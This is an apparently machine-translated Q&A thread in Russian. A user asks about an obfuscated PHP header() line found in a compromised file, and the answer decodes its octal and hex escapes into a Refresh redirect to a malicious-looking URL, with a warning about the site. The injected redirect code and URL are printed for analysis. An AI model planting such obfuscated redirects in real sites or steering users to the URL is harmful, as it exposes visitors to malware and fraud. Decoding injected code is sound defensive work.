2

Я нашел некоторый кодированный в base64 текст в скомпрометированном php-файле. Когда я декодировал строку base64, это была следующая директива:

header("R\145\x66resh\072\x20\x32\x35\x3b\x20\x75r\x6c\075\"\x68\164\164\x70\x3a\057\057\146\143b\x61\162\x63\145\154on\141\144\157\x64\157\143\x6fm.\x69\x6e\x66\157\057uk\"");

Какая кодировка это строка URL? Сначала я думал hex, затем ascii, но его переменной длины. Я сделал Google, но безрезультатно. Может ли кто-нибудь указать мне правильное направление?

1 ответ1

5

Предупреждение:

Ниже приведен URL-адрес взломанного веб-сайта.

Посещение сайта приносит пользу злоумышленнику в финансовом отношении и может нанести вред вашему компьютеру.

Строка означает

Refresh: 25; url="http://fcbarcelonadodocom.info/uk"

\145 - это кодовая точка 145 (восьмеричная), \x66 - это кодовая точка 66 (шестнадцатеричная).

Проверять:

  1. казнить

    php
    
  2. Тип

    <?php
        echo "R\145\x66resh\072\x20\x32\x35\x3b\x20\x75r\x6c\075\"\x68\164\164\x70\x3a\057\057\146\143b\x61\162\x63\145\154on\141\144\157\x64\157\143\x6fm.\x69\x6e\x66\157\057uk\"";
    ?>
    
  3. Нажмите Ctrl + D.

Всё ещё ищете ответ? Посмотрите другие вопросы с метками .